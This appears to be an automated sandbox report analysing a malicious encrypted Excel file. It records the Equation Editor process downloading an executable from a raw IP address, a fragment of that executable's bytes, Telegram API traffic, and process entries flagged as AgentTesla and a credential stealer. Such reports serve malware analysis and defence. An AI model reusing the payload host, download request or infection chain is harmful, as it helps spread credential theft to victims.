                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                                                                                                      Data Raw:08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00
                                                                                                      Stream Path: \x6DataSpaces/DataSpaceMap, File Type: data, Stream Size: 112
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/DataSpaceMap
                                                                                                      File Type:data
                                                                                                      Stream Size:112
                                                                                                      Entropy:2.7597816111
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                                                                                                      Data Raw:08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00
                                                                                                      Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary, File Type: data, Stream Size: 200
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                                                                                                      File Type:data
                                                                                                      Stream Size:200
                                                                                                      Entropy:3.13335930328
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                      Data Raw:58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00
                                                                                                      Stream Path: \x6DataSpaces/Version, File Type: data, Stream Size: 76
                                                                                                      General
                                                                                                      Stream Path:\x6DataSpaces/Version
                                                                                                      File Type:data
                                                                                                      Stream Size:76
                                                                                                      Entropy:2.79079600998
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:< . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                                                                                                      Data Raw:3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00
                                                                                                      Stream Path: EncryptedPackage, File Type: data, Stream Size: 2247976
                                                                                                      General
                                                                                                      Stream Path:EncryptedPackage
                                                                                                      File Type:data
                                                                                                      Stream Size:2247976
                                                                                                      Entropy:7.9999090543
                                                                                                      Base64 Encoded:True
                                                                                                      Data ASCII:. M " . . . . . . 8 : 2 . j B . . C S . . . . e . ) . a . O * . v , . . \\ [ . . . c . = ) . / X . . . . . X . . L 1 . . b . . . . . . . . . ^ . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . . M . . . o . 6 . Z . . . . . . .
                                                                                                      Data Raw:18 4d 22 00 00 00 00 00 06 38 3a 32 d0 6a 42 c2 ac 43 53 19 99 a1 05 65 f9 29 01 61 19 4f 2a 8e 76 2c cf ba 5c 5b e4 fc 15 63 9e 3d 29 dc 2f 58 bd 11 d1 08 e8 58 f3 08 4c 31 c0 2e 62 ad 03 8d 1d e5 e7 96 fc ad 5e b0 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6 4d 03 f0 cc 6f 8f 36 bb 5a 12 9e e2 87 cc 94 f6
                                                                                                      Stream Path: EncryptionInfo, File Type: data, Stream Size: 224
                                                                                                      General
                                                                                                      Stream Path:EncryptionInfo
                                                                                                      File Type:data
                                                                                                      Stream Size:224
                                                                                                      Entropy:4.51192910595
                                                                                                      Base64 Encoded:False
                                                                                                      Data ASCII:. . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . . c . . ? v . . 0 . . . . . . W P . . . . 5 . @ N . { . . . . . 6 . . . k . d . . . . { . . . . . . S ( . [ 5 ] . . } r P ] S .
                                                                                                      Data Raw:04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                                                                                                      Network Behavior

                                                                                                      Network Port Distribution

                                                                                                      TCP Packets


UDP Packets

Timestamp                            Source Port  Dest Port  Source IP     Dest IP
Apr 8, 2021 12:52:09.397815943 CEST  52197        53         192.168.2.22  8.8.8.8
Apr 8, 2021 12:52:09.409843922 CEST  53           52197      8.8.8.8       192.168.2.22

DNS Queries

Timestamp                            Source IP     Dest IP  Trans ID  OP Code             Name              Type            Class
Apr 8, 2021 12:52:09.397815943 CEST  192.168.2.22  8.8.8.8  0xd07c    Standard query (0)  api.telegram.org  A (IP address)  IN (0x0001)

DNS Answers

Timestamp                            Source IP  Dest IP       Trans ID  Reply Code    Name              CName  Address          Type            Class
Apr 8, 2021 12:52:09.409843922 CEST  8.8.8.8    192.168.2.22  0xd07c    No error (0)  api.telegram.org  -      149.154.167.220  A (IP address)  IN (0x0001)

HTTP Request Dependency Graph

• 198.23.174.104

HTTP Packets

Session ID  Source IP     Source Port  Destination IP  Destination Port  Process
0           192.168.2.22  49167        198.23.174.104  80                C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp                            kBytes transferred  Direction  Data
Apr 8, 2021 12:50:32.080419064 CEST  0                   OUT        GET /hkn.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 198.23.174.104
Connection: Keep-Alive

Apr 8, 2021 12:50:32.198482990 CEST  1                   IN         HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 10:50:31 GMT
Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.27
Last-Modified: Thu, 08 Apr 2021 08:14:53 GMT
ETag: "d7200-5bf71a458267a"
Accept-Ranges: bytes
Content-Length: 881152
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload
Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL}n`P*FfI `@ @IO`,B H.textl) * `.rsrc,B`D,@@.relocp@BHIH?HL0(( (o!*("(#($(%(&*N(ol('*&((*s)s*s+s,s-*0~o.+*0~o/+*0~o0+*0~o1+*0~o2+*0<~(3,!rp(4o5s6~+*0~


HTTPS Packets

Timestamp                            Source IP        Source Port  Dest IP       Dest Port  JA3 SSL Client Fingerprint                                                                                                                                        JA3 SSL Client Digest
Apr 8, 2021 12:52:09.545206070 CEST  149.154.167.220  443          192.168.2.22  49168      771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19-5-4,0-10-11-13-23-65281,23-24,0  36f7277af969a6947a61ae0b815907a1

Certificate chain presented in this session (leaf first):

Certificate 1
Subject:    CN=api.telegram.org, OU=Domain Control Validated
Issuer:     CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US
Not Before: Tue Mar 24 14:48:17 CET 2020
Not After:  Mon May 23 18:17:38 CEST 2022

Certificate 2
Subject:    CN=Go Daddy Secure Certificate Authority - G2, OU=http://certs.godaddy.com/repository/, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US
Issuer:     CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US
Not Before: Tue May 03 09:00:00 CEST 2011
Not After:  Sat May 03 09:00:00 CEST 2031

Certificate 3
Subject:    CN=Go Daddy Root Certificate Authority - G2, O="GoDaddy.com, Inc.", L=Scottsdale, ST=Arizona, C=US
Issuer:     OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US
Not Before: Wed Jan 01 08:00:00 CET 2014
Not After:  Fri May 30 09:00:00 CEST 2031

Certificate 4 (self-signed root)
Subject:    OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US
Issuer:     OU=Go Daddy Class 2 Certification Authority, O="The Go Daddy Group, Inc.", C=US
Not Before: Tue Jun 29 19:06:20 CEST 2004
Not After:  Thu Jun 29 19:06:20 CEST 2034

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 12:49:50
Start date: 08/04/2021
Path: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit): false
Commandline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase: 0x13f6d0000
File size: 27641504 bytes
MD5 hash: 5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:13
Start date: 08/04/2021
Path: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit): true
Commandline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase: 0x400000
File size: 543304 bytes
MD5 hash: A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 12:50:15
Start date: 08/04/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\Public\vbc.exe'
Imagebase: 0xdb0000
File size: 881152 bytes
MD5 hash: 5F968F612F82F74C96DD257793CF917D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.2167865377.00000000023C3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2168116812.00000000033AC000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 17%, ReversingLabs
Reputation: low

General

Start time: 12:50:17
Start date: 08/04/2021
Path: C:\Users\Public\vbc.exe
Wow64 process (32bit): true
                                                                                                      Commandline:C:\Users\Public\vbc.exe
                                                                                                      Imagebase:0xdb0000
                                                                                                      File size:881152 bytes
                                                                                                      MD5 hash:5F968F612F82F74C96DD257793CF917D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:.Net C# or VB.NET
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380779380.0000000002560000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2380715131.00000000024C1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.2380056335.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                      Reputation:low

                                                                                                      Disassembly

                                                                                                      Code Analysis
